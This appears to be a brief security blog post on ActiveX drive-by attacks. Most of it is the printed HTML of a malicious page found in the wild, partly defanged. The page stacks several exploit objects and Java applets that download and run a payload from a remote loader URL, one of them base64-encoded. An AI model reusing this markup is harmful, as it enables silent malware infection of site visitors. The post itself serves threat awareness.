ActiveX is a proprietary Microsoft technology, which allows developers to produce reusable software components. The controls are compatible with the Internet Explorer (IE) web browser and over the years have been a frequent security threat, as many developers have produced insecure ActiveX controls which can lead to the remote execution of code when a user with IE visits a malicious web page. This is a very powerful tool for attackers because everything happens in the background (no user interaction), and they can trigger exploitation with only a few lines of code.
I recently stumbled upon a page using no fewer than 8 different ActiveX exploits on the same page:
<html><body><object
classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="OpenWebFile"
VALUE="hxxp://xxx/loading.php?spl=ActiveX_pack"></object>
<object classid="clsid:BBBBBBBB-BBBB-BBBBB-BBBB-BBBBBBBBBBBB">
<PARAM NAME="OpenWebFile"
VALUE="http://xxx/loading.php?spl=ActiveX_pack"> </object>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="OpenWebFile"
VALUE="http://xxx/loading.php?spl=ActiveX_pack"> </object>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA5">
<PARAM NAME="OpenWebFile"
VALUE="http://ally.serveblog.net//loading.php?spl=ActiveX_pack"> </object>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="installAppMgr"
VALUE="http://xxx/loading.php?spl=ActiveX_pack"></object>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="PerformUpdateAsync"
VALUE="http://xxx/loading.php?spl=ActiveX_pack"></object>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="ExecutePreferredApplication"
VALUE="http://xxx/loading.php?spl=ActiveX_pack"></object>
<OBJECT ID="DownloaderActiveX1" WIDTH="0" HEIGHT="0"
CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61"
CODEBASE="http://xxx/DownloaderActiveX.cab#Version=1,0,0,1">
<PARAM NAME="propProgressbackground" VALUE="#bccee8">
<PARAM NAME="propTextbackground" VALUE="#f7f8fc">
<PARAM NAME="propBarColor" VALUE="#df0203">
<PARAM NAME="propTextColor" VALUE="#000000">
<PARAM NAME="propWidth" VALUE="0">
<PARAM NAME="propHeight" VALUE="0">
<PARAM NAME="propDownloadUrl"
VALUE="http://xxx/loading.php?spl=ActiveX_pack">
<PARAM NAME="propPostdownloadAction" VALUE="run">
<PARAM NAME="propInstallCompleteUrl" VALUE="">
<PARAM NAME="propbrowserRedirectUrl" VALUE="">
<PARAM NAME="propVerbose" VALUE="0">
<PARAM NAME="propInterrupt" VALUE="0"> </OBJECT>
<OBJECT id="sysWIN" WIDTH=1 HEIGHT=1
classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA"
codebase="http://xxx/Bol.CAB"></OBJECT>
<script language="vbscript">
sysWIN.url = "http://xxx/loading.php?spl=ActiveX_pack"
sysWIN.fontsize = 10sysWIN.barcolor = 00FF00
sysWIN.start = "start"</script>
<applet code="sklif.Hieeyfc.class" archive="j1_ke.jar" width="480"
height="200">
<param name="data" VALUE="http://xxx/loading.php?spl=javadnwa&">
<param name="cc" value="1"> </applet>
<applet width="100%" height="100%" code="Uutecwv" archive="j2_93.jar">
<param name="site"
VALUE="aHR0cDovL2FsbHkuc2VydmVibG9nLm5ldC8vbG9hZGluZy5waHA/c3BsPWphdmFkbndiJg==">
</applet>
By submitting the form, you are agreeing to our privacy policy.